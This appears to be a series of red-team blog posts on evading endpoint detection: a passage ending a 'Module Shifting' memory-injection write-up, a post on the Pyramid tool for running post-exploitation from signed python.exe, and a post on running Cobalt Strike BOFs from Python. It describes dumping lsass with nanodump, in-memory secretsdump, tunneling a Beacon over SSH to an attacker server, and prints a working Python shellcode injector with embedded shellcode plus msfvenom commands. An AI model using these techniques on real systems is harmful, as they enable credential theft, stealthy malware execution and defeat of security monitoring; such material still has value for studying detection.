In fact, some .NET dlls are known to do self-modifications on their .text section, leading to the Moneta’s “Modified Code” IoC. Third-party apps like Discord and Signal also have the same behaviour, it’s interesting to note that the size of the bytes that they’re overwriting is bigger in the latter cases.

Generally, the bigger the size the dll is self-modifying, the better, since an attacker can smuggle a bigger payload and mimick the exact same behaviour of the legitimate applications. In particular, security solutions would probably whitelist this behaviour otherwise they’ll be overwhelmed by false positives and customers will be unhappy.


False Positives - self-modifying behaviours done by legitimate applications

Starting Point - PythonMemoryModule

After defining the strategy, we should start somewhere and iterate to improve. Our starting point is the MemoryModule technique, that is instrumental to the Module Overloading injection that we’ll target later on.

MemoryModule is a technique firstly published by Joachim Bauch and is used to map and load a dll in memory without calling the LoadLibrary Windows API. This is achieved by executing the same operations done by the Windows Loader when issuing the LoadLibrary API call The following image depicts its basic steps:


MemoryModule technique

In order to use the MemoryModule technique with a Python interpreted loader, the technique has been ported to Python ctypes and is available on my PythonMemoryModule github project.

Combining the PythonMemoryModule project with Pyramid we can achieve the injection of a Cobalt Strike dll with MemoryModule technique using a full in-memory Python loader. In the following video we’ll demostrate the injection and the scanning results of Moneta and PE-Sieve on the injected process.

In summary, PythonMemoryModule used with a Cobalt Strike dll is producing the following IoCs:


IoCs generated by MemoryModule and Cobalt Strike dll Artifact

The Abnormal Private executable Memory IoC detected at 0x6bac1000 is due to the MemoryModule injection technique that copied the .text section at that address and changed its permissions to RX subsequently.

The other abnormal private executable memory IoC is generated because Cobalt Strike dll is self-bootstrapping Beacon in another area of memory (0x1c575a90000) so we basically here have two PEs in memory that are generating IoCs but only one is running Beacon. Dynamic memory allocation would necessarily nead to “Abnormal Private Executable Memory” IoC at some point, se we would want to get rid of this IoC in the first place.

Module Overloading and Module Stomping techniques can provide us a way to avoid dynamic memory allocation.

Module Overloading

Module Overloading technique, firstly published by Aleksandra Doniec, aims at avoiding the creation of dynamic memory allocation by firstly loading a hosting dll using LoadLibrary API, overwriting malicious content (PE) onto it, and loading it using the same Memory Module steps we saw earlier.

In this way the legitimate hosting dll is loaded via LoadLibrary API, but malicious content is loaded using the Memory Module technique over the memory space of the hosting dll that is legitimately loaded. This clever mix makes the Module Overloading Technique.

At a high level, Module Overloading steps (as implemented by Aleksandra Doniec) look like this:


Module Overloading injection technique

Even though this technique is stealthier than Memory Module, we still have some IoCs to work on. Specifically, Moneta will identify “Modified Code” and “Modified Header” as IoCs after executing the injection.


Module Overloading IoCs

This result stems from the fact that we overwrote the hosting dll memory space with malicious content, so when Moneta and PE-Sieve are doing a comparison between on-disk bytes of the hosting dll with its memory counterpart this will mismatch and fire the “Modified Code” and “Replaced” IoC if the overwriting happen to come across the hosting dll’s mapped .text section.

The “Modified Header” IoC is generated because this technique implementation starts overwriting from the very top of the hosting dll memory space, thus overwriting the PE header that commonly happens to reside in the first 0x1000 bytes.

All things considered, we got rid of the MemoryModule’s “Abnormal Private Executable memory” IoC but we introduced other IoCs related to the hosting dll byte-by-byte comparison between on-disk and memory space.

However, we can improve a bit this outcome by introducing Module Stomping injection technique.

Module Stomping

Module stomping provides the same Module Overloading benefit of avoiding dynamic memory creation through the loading of a hosting dll to be used as “disposable space” onto which overwrite malicious content. The main difference is that Module Stomping is way more simpler than Module Overloading because its aim is writing and executing shellcode, not a PE. So we don’t need the Windows Loader steps that both Memory Module and Module Overloading adopted, with Module Stomping we just need to write and directly executing shellcode.

Some Module Stomping implementations have been made publicly available by F-Secure and Bobby Cooke

At a high level, Module Stomping steps look like this:


Module Stomping injection technique

After injecting via Module Stomping using wmp.dll as hosting dll and writing the malicious shellcode over the .rsrc section we obtain the IoCs depicted in the following image.


Module Stomping IoCs

We gradually reduced the generated IoCs but “Modified Code” is still haunting us because it’s a trademark for both Module Stomping and Module Overloading technique. The “inconsistent +x between disk and memory” is obtained because of the shellcode written over the .rsrc section and subsequent +RX permission set. Moneta is complaining about the fact that .rsrc section originally does not have executable permission.

Both of these IoCs can be finally avoided with some improvements that are implemented in a technique dubbed “Module Shifting”.

Module Shifting

Till now we observed how some injections behave in memory and gained a bit of knowledge of how and why memory scanners identifiy suspicious memory anomalies.

We can use this knowledge to our advantage by asking ourself few what-if questions:

what if the writing of the shellcode is shifted to a section of a dll that is normally self-modifying the exact section?
what if we inject using a self-modifying dll as host with enough space to write our shellcode and we apply some padding to look exactly as the self-modifying behaviour?
what if we use a shellcode payload that is functionally independent from further stages and we overwrite the executed shellcode with the dll’s original bytes?

After experimenting and answering all these questions we came up with the Module Shifting technique that aims at improving Module Stomping and Module Overloading by providing the following advantages:

Avoids “Modified code” between virtual memory and on disk dll leaving near to zero suspicious memory artifacts, getting no indicators on Moneta and PE-Sieve
better blending into common False Positives by choosing the target section and using padding
Can be used with PE and shellcode payloads
Implemented in Python ctypes – full-in-memory execution available

At a high level, Module Shifting steps look like this:


Module Shifting Injection technique

The restore operation is quite simple and is done after executing the initial shellcode.

1
2
3
4
5
6
7
# Restore operation     
        VirtualProtect(
                cast(tgtaddr,c_void_p), 
                mod_bytes_size,
                PAGE_READWRITE,  
                byref(oldProtect))
        memmove(cast(tgtaddress,c_void_p), self.targetsection_backupbuffer, mod_bytes_size)

After setting the shellcode memory area permissions to RW the content of targetsection_backupbuffer, containing a copy of the original dll for the same exact amount of shellcode bytes and position, gets written over the shellcode. This effectively restores the stomped bytes to the original ones, leaving no traces of the written shellcode anymore. In this way, Moneta and PE-Sieve will do a byte-by-byte comparison as usual and will find no mismatch between the hosting dll on-disk bytes and in-memory ones.

There won’t be also any inconsistent executable permissions because we set the permissions back to the section’s original values.

Following is a demonstration of a self-process injection with Module Shifting technique using a Cobalt Strike Beacon shellcode generated with AceLdr. After executing Moneta and PE-Sieve we get no IoCs detected because there are no artifacts left by Module Shifting injection technique (payload is not our focus), that was our initial aim.

Even though Moneta and PE-Sieve did not generate IoCs, a runtime inspection scanner could identify some anomalies. In fact, overwriting a 307,2 kB payload over the .text section of mscorlib.ni.dll can be a malicious indicator because the common behaviour for this dll is to overwrite 45 kB.

However, this anomaly could not be spotted by scanners without runtime inspection capabilities, because Module Shifting does not leave artifacts floating around after having restored the stomped bytes.


Detection Opportunities

Outro

Concluding this exploration, we dove deep into the intricacies of injection techniques, honing in on Module Stomping and Module Overloading as part of the PE injection arsenal.

The objective was clear: to improve these techniques, aiming for more operational stealthiness. We delved into the journey of improving memory injection techniques While traditional approaches like Module Stomping faced challenges with “Modified Code” IoC due to the stomped code’s residence in the hosting dll, we’ve delineated a strategy to finally circumvent these obstacles. The newly introduced Module Shifting technique encapsulates these enhancements, offering a more nuanced way to to operate with a greater stealthiness.

The key takeaways for this blog post are:

Injection Techniques have several moving parts
Python can be used as a loader with Pyramid and ctypes to dynamically call windows APIs
Memory IoCs can be greatly reduced with a proper injection strategy
Memory scanners can be used by attackers to find False Positives candidates to blend in
Functionally-independent Shellcode payloads once injected and executed can be overwritten with original dll content
ModuleShifting improvements can be applied also to other injection techniques

The future of injection techniques is always evolving, and the landscape will continually shift towards greater sophistication and precision.

Living-Off-the-Blindspot - Operating into EDRs’ blindspot

2022-09-01T00:00:00-04:00

TL;DR
Intro
EDRs Defenses
Bypass Strategy
Leveraging Python
Conclusions
How to defend from this

The topic has been presented at DEFCON30 - Adversary village (deck is available here)

TL;DR

Python provides some key properties that effectively creates a blindspot for EDR detection, namely:

Python’s wide usage implies that a varied baseline telemetry exists for Python interpreter that is natively running APIs depending on the Python code being run. This can increase the difficulty for EDRs’ vendor to spot anomalies coming from python.exe or pythonw.exe.
Python lacks transparency (ref. PEP-578) for dynamic code executed from stock python.exe and pythonw.exe binaries.
Python Foundation officially provides a “Windows embeddable package” that can be used to run Python with a minimal environment without installation. The package comes with signed binaries.

An attacker could leverage the Python official Windows Embeddable zip package dropping it on disk and using the signed binary python.exe (or pythonw.exe) to execute a wide range of post exploitation tasks.

Having this in mind, a tool named Pyramid has been developed to demonstrate that one can bring useful capabilities into python.exe and can operate by successfully evading EDRs detection. Pyramid can execute the following techniques straight from python.exe or pythonw.exe:

dynamically importing and executing Python-BloodHound and secretsdump.
executing BOF (dumping lsass with nanodump).
creating SSH local port forward to tunnel a C2 Agent.

The tool has been successfully tested against several EDRs, demonstrating that a blindspot is indeed present and it is possible to execute a range of capabilities from it. This technique has been dubbed Living-off-The-Blindspot.

Intro

EDRs are commonly encountered by red teamers during engagements and it is vital to know some concepts on how to operate under their scrutiny without being detected.

In an effort to find a way around several EDRs, the bypass problem has been analyzed looking in a more holistic way at the current defenses put in place by EDRs in order to find a novel strategy that could enable operating in blind spots, rather than bypassing a single defense mechanism.

EDRs Defenses

EDRs deploy several defenses in order to detect and respond to threats. The common requirement for all the defenses is visibility, since you can’t protect what you can’t see. Visibility can be understood as the EDR’s capability to properly process information aimed at gaining context for a specific status/action/language/technique on a system or network. Information can come from OS sources (such as AMSI or ETW) or via proprietary techniques.

In the following paragraphs will be provided some key concepts for every major Defense that must be took into consideration while thinking about a bypass strategy. This post is not meant to be an extensive explanation of each defensive measure since there are much better resources already available online (check here). Bear in mind that Defenses do not usually work in silos, information are shared among them in order to contribute in the detection of a malicious activity.

Kernel Callbacks and Usermode Hooking

Two common ways of increasing visibility for EDRs are Kernel Callbacks and Usermode Hooking.

Kernel Callbacks are commonly used to get information on processes and loaded images and to inject EDR’s dll into newly created processes (see example in the image below). The PsSetCreateProcessNotifyRoutine routine registers a Kernel Callback such that when a specific action occurs (i.e. process creation) the routine will send a pre or post-action notification to the Driver, that will then execute its callback. In the example below the Kernel driver will instructs the EDR process to inject the EDR’s dll into the newly created process, setting the groundwork for usermode hooking.


Kernel Callback example

The EDR’s dll is then used mainly to perform Usermode Hooking patching ntdll.dll and inspecting specific Windows API calls made by processes to take some action if the call deemed as malicious.


Usermode Hooking example

Usermode hooking has at least two big limitations:

EDRs do not hook every Windows API call for performance issues, instead they rely on hooking in the APIs that are mostly abused by malware.
Hooking is also done in usermode, so every usermode program can theoretically undo the hooking.

Memory Scanning

Memory scanning techniques look for pattern in the code and data of processes. From an EDR point of view they are resource intensive, so one of the most common approach is to do timely or triggered scans based on events/detections/analyst actions.

From an attacker perspective, memory scans are dangerous because even a fileless payload once is executing its routines has to be in cleartext in memory. Recently, the offensive security community came up with techniques (such as ShellcodeFluctuation and Sleep mask for Cobalt STrike) to mitigate the risk of detection in memory, that basically obfuscate the code in memory after a payload is “sleeping” - i.e. not executing tasks and waiting to fetch command from C2 after a certain time.

However, the risk is still relevant while the payload is executing tasks and if a memory scan is triggered by malicious operations done by the payload, this may very well lead to a memory dump or a pattern matching between the cleartext version of the payload code and a set of known-bad signatures.

ML based detections

Machine Learning is an entire discipline and I don’t dare to cover it extensively since I am no expert at all and there are many other better resources elsewhere. However, we can focus on some key-concepts that are employed in ML detections that can be very useful in defining a bypass strategy. Starting with the very basics, we can say that Machine Learning can detect variant malware files that can evade signature-based detection.

Malware peculiar characteristics are translated into “features” and used for Machine Learning models training. Features can be static (idantifiable without executing samples) or dynamic (extracted at runtime). Basically, to detect malware using Machine Learning, one can collect large amount of malware and goodware samples, extract the features, train the ML system to recognize malware, then test the approach with real samples.

The features play an important role during the process because they are related to sample properties. Some common features to determine if a file is good or bad are if the file is digitally signed or if it has been seen on more than 100 network workstations. On the other hand, features used to determine if a file is bad could be the presence of malformed or encrypted data and a suspicious series of API calls made by the binary (dynamic feature).

The key concept here is that features have a “weight” into the decision process of a ML model (assigning weights to features is one of the ML training purposes). In layman terms, this means that features with a higher weight might bend the ML model decision toward malware or goodware more than other lower weight features. Security vendors do not publish weights nor the features used by their ML models, but as attackers we can think about at least one feature that can help evading detections: Digital Signature. It is in fact true that malware developers and operators often try to sign their malware to evade security solutions because this property is often used as a goodware feature by ML models and probably with a pretty good weight.

Another dynamic feature that can be abused by properly choosing the binary under which to operate is the API call sequence. This would work well for malware samples but

what about malicious code that gets executed in-memory by an interpreter?

In that case, the API call sequence made by the interpreter binary can be virtually everything because it depends on the code run by the intrerpreter. How are security vendors handling that? I don’t have exact answers to these questions but we can test EDRs behaviour and draw some conclusions.

IoCs and IoAs

One definition of IoC is “an object or activity that, observed on a network or on a device, indicates a high probability of unauthorized access to the system”, in other words, IoCs are signatures of known-bad properties or actions performed by malware. IoCs is useful for forensics intelligence after an attack has occurred but can also provide false positives and their effectiveness is limited to techniques and malware that is currently known by defenders.

On the other hand, Indicator of Attack (IoAs) can be defined as an indicator stating that an attack is ongoing. The indicator resulted from the correlation of deemed malicious actions made by an attacker and and the systems/binaries involved. IoAs cannot be as useful as IoC for forensics purposes but can be much more useful in identifying an ongoing attack.

Bypass Strategy

Knowing some, although very basic, key concepts on common Defenses put in place by EDRs, can help shaping a bypass strategy. Abstracting the technical details and digesting the information keeping an offensive mindset, we could summarize the previously listed Defenses in the following statements:

Usermode Hooking is applied only to certain APIs and can be circumvented from usermode.
Kernel Callbacks cannot be circumvented from usermode but are mainly used to provide visibility on newly created process, loaded images and to trigger EDR’s DLL injection into newly created processes.
Executing C2 payloads will increase the risk for detection by memory scans and may trigger IoCs.
ML-based detections can assign a bad score to unknown and unsigned binaries, and a better score to signed and widely used binaries.
IoAs can detect a malicious action by analyzing anomalies of the steps taken in executing that action.

Each of the statements is an approximation and does not fully represent the characteristics of a single Defense, but still provide useful information on key properties that can be exploited for a bypass. I hate analogies when it comes to IT topics, but the statements can be seen as ski-gates for a ski track (bypass) that does not exist yet. We just have to draw one possible track keeping the gates as boundaries.

Main Categories of EDR Evasion operations

When it comes to evading an EDR, there are four main categories of operations:

Avoiding the EDR - this can be accomplished by operating from VPN, proxying traffic, or compromising only targets not equipped with EDRs.
Blending into the environment - Executing operations abusing tools and actions commonly observed in the target network (e.g. administrative RDP sessions, usage of legit Administrative tools, Teams abuse
EDR tampering - this category involves disabling or limiting EDR’s features or visibility in order to perform tasks without triggering an EDR response or without sending alerts to the central repository. For more details please check this awesome blogpost: “How To Tamper the EDR” by my friend Daniel Feichter @VirtualallocEx
Operating in blind spots - EDR have finite resources and finite visibility, so blind spots are always present. Operating leveraging blindspots is powerful since it brings the less amount of risk of being detected.

One can translate relate the categories in a corresponding risk for the relevant type of operation. I depicted the risk brought by the type of operation in a Pyramid of Pain (Attacker’s Version), where the layer’s of the Pyramid are ordered by the amount of risk introduced by the Operation type (bottom-up).


Attacker’s Pyramid of Pain - Mapping risk levels to EDR Evasion category

It’s usually not always viable avoiding EDRs for the whole operation, especially for multi-month ones. Ideally an attacker would want to operate in the bottom layer of the Pyramid in order to minimize risk of being detected by EDRs, however, this type of operation must be backed techniques and capabilities that usually require some amount of research to identify and exploit blindspots. As attackers, we decided to follow this route and the following paragraphs will outline the strategy employed.

Operational constraints

We should define now some contraints and limitations under which we would want to operate. EDR avoidance actions category are basically ruled out, because we’ll want to focus on finding and exploiting EDRs’ blind spot and also because avoiding EDRs at every stage of an operation is not always feasible. For that reason we’ll want to:

operate directly on an EDR equipped box without proxying traffic or avoiding to engage with EDRs.
be able to operate mainly agentless in order to keep memory indicators low and perform common post-exploitation tasks without needing a C2 agent running.
avoid remote process injection and dropping malicious artifacts on disk for the very same reason of keeping memory indicators low, .
keep C2 agent execution capability as a last-resort since in some cases we’ll have to accept the tradeoff risk to get extended C2 features available.

To operate in a similar scenario we would need some capabilites in our tooling, such like:

Dynamic module loading
Compatibility with community-driven tools
Traffic tunneling without spawning new processes

Choosing a language

Operations require capabilities that in turn are coded in a programming language. So it makes sense to start first by choosing a programming language that could be functional in finding blind spots AND accelerate capabilities development.

The programming language that would better fit the scenario in which we’ll be operating should have the following requirements:

the programming language of choiche should be a non-native language (to avoid using custom compiled malicious artifacts) and provide a signed interpreter to execute code.
it must be possible to execute code without directly install tools on the target machine.
existing public tooling in that same language could be imported.
additional capabilities could be developed without much hassle.
Should provide the least amount possible of optics to EDRs.

The candidates languages were F#, Javascript, C# and Python. However, after having exluded languages with integrated optics into OS (such as AMSI for C# and F#) or with few offensive public tooling available, Python seemed the most promising candidate. As a matter of fact, Python can satisfy the above requirements since:

Python is an interpreted language and cames officially with a signed interpreter. It’s not tightly integrated with OS optics since Python uses native systems API directly and existing monitoring tools either suffer from limited context or auditing bypass. PEP-578 wanted to solve this issue, since there is no native way of monitoring what’s happening during a Python script execution. However, as we’ll see later, the issue is not solved yet.
Python.org ditributes Windows Embeddable zip packages containing a minimal Python enviromnet that does not require installation.
There is a huge amount of public tooling available written in Python that can be imported and used
Python can provide access to Windows APIs via ctypes and shellcode can be injected into the Python process itself using Python, allowing theoretically the execution of any managed code or the development of any capability in Python (C# assemblies could also be ran using Donut).

The above-listed properties indicates what could be a candidate blindspot within which we can build capabilities and test its effectiveness against EDRs. The fact that currently there isn’t an out-of-the-box way to inspect dynamic Python code execution opens up a very interesting avenue for attackers.

Furthermore, Python is widely used and its (signed) interpreter is executing directly windows API calls depending on the Python code ran. This imply an enormous variety of telemetry and API calls ran from the very same binary (python.exe or pythonw.exe) that brings other precious extra points when it comes to operating undetected with EDRs. In fact, it will likely be difficult for EDR vendors to spot anomalies (and build detections) coming from python.exe when its baseline telemetry is so varied.

All things considered, Python provides some unique opportunities that can be exploited to operate in EDRs’ blindspot.

Leveraging Python

To help operate within the blindspots provided by Python I wrote a tool named Pyramid (available on my github). The tool’s aim is to leverage Python to operate in the blindspots identified previously by currently using four main techniques:

Execution Method - Dropping and running python.exe from “Windows Embeddable Zip Package”.
Dynamic in-memory loading and execution of Python code.
Beacon Object Files execution via shellcode.
In-process C2 Agent injection.

Execution Method

The execution method for our techniques should be aimed at creating the less amount possible of suspicious indicators that could trigger an anomaly or a detection. Thinking about the Defenses, one could trick ML-detections by using the signed Python interpreter and IoAs by avoiding to create uncommon process tree patterns.

So the most simple way to achieve this would be dropping the Windows Embeddable zip package on a user folder or share and launching directly python.exe (or pythonw.exe) without spawning it from C2 agents or unknown binaries. This acton would mimick a common execution for Python and wouldn’t likely be flagged as malicious by EDRs.

Dynamic in-memory import

The technique of importing dynamically in-memory Python modules has been around for quite some time and some great previous work has been done by xorrior with Empyre, scythe_io with in-memory Embedding of CPython, ajpc500 with Medusa.

The core for Dynamic import is the PEP-302 “New Import Hooks” that is describing how to modify the logic in which python modules are located and how they are loaded. The normal way of Python to import module is to use a path on disk where the module is located. However, we want to import modules in memory, not from disk.

Import hooks allow you to modify the logic in which Python modules are located and how they are loaded, this involves defining a custom “Finder” class and either adding finder objects to sys.meta_path sys.meta_path holds entries that implement Python’s default import semantics (you can view an example here)

So basically to use PEP-302 and be able to import modules in-memory one should:

Use a custom Finder class. Pyramid finder class in based on Empyre one.
In-memory download a Python package as a zip.
Add the zip file finder object to sys.meta_path.
Import the zip file in memory.

There are some limitations though, firstly PEP-302 does not support importing python extensions (*.pyd files) and secondly if you are in-memory importing a package with lot of dependencies this will bring conflicts between them (dependencies nightmare) and will be needed to sort them out.

The first problem is the most complex one, since to in-memory import *.pyd files the CPython interpreter needs to be re-engineered and recompiled (that’s what scythe_io did), hence losing the precious digital signature. We can avoid losing the Python interpreter digital signature by dropping on disk the *.pyd files needed for the Python dependency that we want to import in-memory.

In fact, looking at the normal Python behavior when it comes to importing *.pyd files (that are essentially dlls), we can see that under the hood they are loaded using the windows API LoadLibraryEx and taking the path on disk. We can accept a tradeoff and import pyd files by dropping them on disk and continue importing in-memory all the other modules that do not require *.pyd files. This will allow us to maintain the interpreter digital signature and we’ll use the normal Python behaviour in loading the extensions.


Normal Python behaviour for loading pyd files

The second problem has been solved by manually addressing every dependency issue while importing the packages python-bloodhound, paramiko, impacket secretsdump and providing the fixed dependencies in Pyramid to use with a freezed version of the target packages. The technique execution flow is depicted in the following scheme:


Dynamically importing and executing BloodHound-Python/secretsdump with Pyramid

Here’s a demonstration of using Pyramid to run Python-BloodHound from Python.exe after having imported in-memory its dependencies. Only the Cryptodome wheel has been dropped on disk because it contains pyd files used by BloodHound.

In the following video Pyramid has also been used to dynamically in-memory import impacket-secretsdump.

Beacon Object File execution via shellcode

This technique has already been introduced in my previous blogpost, however, the TL;DR is that we can use COFFloader and BOF2Shellcode to execute Beacon Object Files via shellcode. The shellcode can then be injected directly into python.exe using Python and ctypes.

We can dump lsass directly from Python.exe using nanodump, but we need to modify it a bit in order to work with our technique. Since we’ll be executing a BOF without a Cobalt Strike Beacon running, we should get rid of all the internal Beacon API call because otherwise the BOF will crash. We should also hardcode command line parameters to increase BOF execution stability thus getting rid of command line parsing functions. Finally, we can choose our preferred method of dumping lsass and hardcode it too.

Bear in mind that with this technique no pyd files are dropped on disk.

The technique execution flow is depicted in the following scheme:


Dumping LSASS with Pyramid and nanodump

In the following video Pyramid has been executed to dump lsass on a machine equipped with a top-tier EDR (details have been blurred and I won’t name EDR product) using nanodump BOF and process forking technique.

You can find the modified nanodump used for the demo here on my github

In-process C2 agent injection

Executing a C2 agent increase chances of detection by memory scans, however certain scenarios might require an agent execution for the operation to continue. For this reason Pyramid provide the capability of executing a C2 agent stager and tunnelling its traffic through SSH, all within the python.exe process. This is achieved by first dynamically importing paramiko and then starting SSH local port forwarding to an attacker controlled SSH server in a new local thread.

The C2 agent shellcode is then injected and executed in-process. The stager should be generated using the host 127.0.0.1 as C2 server with the same port opened locally by the SSH local port forward. The technique execution flow is depicted in the following scheme:


In-process tunneling a Cobalt Strike Beacon with Pyramid

In the following video Pyramid has been executed to perform SSH local port forwarding and executing a Cobalt Strike Beacon stager tunneling its traffic over SSH. The OS was equipped with a top-tier EDR also in this case.

Conclusions

It has been demonstrated that Python provides some key properties that effectively creates blindspots for EDR detection, namely:

Python’s wide usage creates a varied baseline telemetry for Python interpreter that is natively running APIs. This can increase the difficulty for EDRs’ vendor to spot anomalies coming from python.exe or pythonw.exe.
Python lacks transparency for dynamic code executed from python.exe or pythonw.exe.
Python Foundation officially provides a “Windows embeddable package” that can be used to run Python with a minimal environment without installation. The package comes with signed binaries.

These properties coupled with operational capabilities such as BOF execution, dynamic import of modules and in-process shellcode injection can help operating into EDRs’ blindspot. Pyramid tool has been developed trying put together all the concepts presented in this post and bringing operational capabilities to be used from the Python Windows embeddable package.

How to defend from this

One obvious way to defend from these techniques would be to flag Python interpreters as Potentially Unwanted Application, forcing EDR customers to investigate alerts and approve or deny Python usage for specific users. However I don’t think that it’ll be feasible in every situation. Attackers could also bring their own interpreter and still use these techniques, but in doing so they’ll lose the Interpreter digital signature, so the attack effectiveness will probably be downgraded.

As an EDR vendor, I would also want to analyze python.exe and pythonw.exe behaviour without biases brought by the varied baseline telemetry that they would have. In this way the Python binaries will be treated as if they were unknown, which is in fact true regarding their behaviour because API calls made by the interpreter are related to the Python code executed.

Running Cobalt Strike BOFs from Python

2022-02-16T00:00:00-05:00

TL;DR

Python might be used to run Cobalt Strike’s BOFs by using previous work from Trustedsec and FalconForce, one can pick a BOF and use BOF2Shellcode to embed the shellcode in a python injector. This brings some post-ex capabilities that could be added to existing frameworks or deployed from a gained foothold making use of a signed binary (python.exe) as a host process for running BOFs using local shellcode injection - PoC on my github.

Intro

Python got great popularity as a C2 language in recent years and the offsec community brought many great projects like TrevorC2, WEASEL, pupy, etc. However, its popularity as a Windows-agent-language never really took off, mainly because of some significant limitations such as:

Final .exe size made huge because of Python interpreter dependencies to be included;
Ease of getting source code from Python artifacts;
Complexity of creating shellcode that executes python code.

This drawbacks stem from the fact that Python is an interpreted language, so you basically have to bring the python interpreter and its dependencies with you, wether you’re creating a stage(r) shellcode or an .exe to deliver. However, I would encompass these 3 big limitations under the “Getting Access” phase of an engagement since python will be basically ruled out if you’re trying to phish or exploit some vulnerability that requires stable and tiny shellcode.

But still, to me Python has so much yet to give during the “Post Exploitation” phase, because, well…“in the EDR era signed binaries are kings”, and it’s worth reminding that the official Python binary is signed indeed. It’s also worth mentioning that in enterprise environments devs do crazy stuff so Python is pretty common almost everywhere. Using python would be a viable way to blend-in on some machines, if we only had modern capabilities to leverage.

This thought has been placed in the backseats of my mind for quite some time, until I saw some recent brilliant projects that opened up some new avenues.

PoC || GTFO

Earlier in 2021 Kevin Haubris from Trustedsec published a cool project called COFFloader, that basically lets you load and run Cobal Strikes Beacon Object Files (BOFs) outside of Cobalt Strike itself. Some weeks ago Gijs Hollestelle from Falconforce published BOF2Shellcode which essentially converts BOFs to raw shellcode and combines it with COFFLoader (converted too) in a way so that BOFs can be loaded by the same resulting shellcode.

Reading the FalconForce post (I highly encourage to do it also since Gijs described the whole process to get things working) I understood that one could simply run BOFs also with python by using the shellcode generated by BOF2Shellcode and the help of an injector. Let’s try this out. As an injector I opted for the local shellcode technique using HeapAlloc technique, to which I added a VirtualProtect to set execute-only permissions since this might be useful for evasion and shenanigans. Bear in mind that by using execute-only permissions you’re out in the cold if using self decoding shellcodes or more complex ones. This only works if the shellcode itself does not need WR permissions, and this might be the case with some BOFs. Here’s the python injector I used:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
"""
	Author: @naksyn

	BOF runner using Local shellcode injection with HeapAlloc()
        /CreateThread() and setting execute-only permissions with
	VirtualAlloc().
	Warning - stagers and shellcodes with self-decoding stubs
 	might not work, change permissions accordingly or remove
	VirtualProtect call by keeping RWX.

"""

from ctypes import *
from ctypes.wintypes import *

# Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)- Author Bobby Cooke @0xBoku - https://www.exploit-db.com/exploits/49819
calc = b"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
calc += b"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
calc += b"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
calc += b"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
calc += b"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
calc += b"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
calc += b"\x48\x83\xec\x20\x41\xff\xd6"

shellcode=calc
kernel32 = ctypes.windll.kernel32
isx64 = sizeof(c_void_p) == sizeof(c_ulonglong)

_kernel32 = WinDLL('kernel32')
HEAP_ZERO_MEMORY = 0x00000008
HEAP_CREATE_ENABLE_EXECUTE = 0x00040000
PAGE_READ_EXECUTE = 0x20
PAGE_EXECUTE= 0x10
ULONG_PTR = c_ulonglong if isx64 else DWORD
SIZE_T = ULONG_PTR

# Functions Prototypes
VirtualProtect = _kernel32.VirtualProtect
VirtualProtect.restype = BOOL
VirtualProtect.argtypes = [ LPVOID, SIZE_T, DWORD, PDWORD ]

# HeapAlloc()
HeapAlloc = _kernel32.HeapAlloc
HeapAlloc.restype = LPVOID
HeapAlloc.argtypes = [ HANDLE, DWORD, SIZE_T ]

# HeapCreate()
HeapCreate = _kernel32.HeapCreate
HeapCreate.argtypes = [DWORD, SIZE_T, SIZE_T]
HeapCreate.restype = HANDLE

# RtlMoveMemory()
RtlMoveMemory = _kernel32.RtlMoveMemory
RtlMoveMemory.argtypes = [LPVOID, LPVOID, SIZE_T ]
RtlMoveMemory.restype = LPVOID

# CreateThread()
CreateThread = _kernel32.CreateThread
CreateThread.argtypes = [ LPVOID, SIZE_T, LPVOID, LPVOID, DWORD, LPVOID ]
CreateThread.restype = HANDLE

# WaitForSingleObject()
WaitForSingleObject = _kernel32.WaitForSingleObject
WaitForSingleObject.argtypes = [HANDLE, DWORD]
WaitForSingleObject.restype = DWORD


heapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, len(shellcode), 0)
HeapAlloc(heapHandle, HEAP_ZERO_MEMORY, len(shellcode))
print('[+] Heap allocated at: {:08X}'.format(heapHandle))
RtlMoveMemory(heapHandle, shellcode, len(shellcode))
print('[+] Shellcode copied into memory.')

VirtualProtect(heapHandle, len(shellcode), PAGE_EXECUTE , ctypes.c_ulong(0))
print('[+] Set RX permissions on memory')
threadHandle = CreateThread(0, 0, heapHandle, 0, 0, 0)
print('[+] Executed Thread in current process.')
WaitForSingleObject(threadHandle, 0xFFFFFFFF)

At this point one would just need to grab the shellcode from Bof2Shellcode using a BOF of our choice, so I opted for Trustedsec’s Tasklist and used bof2shellcode to generate the resulting shellcode, including the COFFLoader:

1
python3 bof2shellcode.py -i /home/naksyn/bofs/tasklist.x64.o -o tasklist.x64.bin

I then used msfvenom to make tasklist.x64.bin trivially embeddable in a python script:

1
msfvenom -p generic/custom PAYLOADFILE=tasklist.x64.bin -f python > sc_tasklist.txt

So after pasting the shellcode into the python injector script let’s see the tasklist BOF coughed out by Python:

⠀

Outro

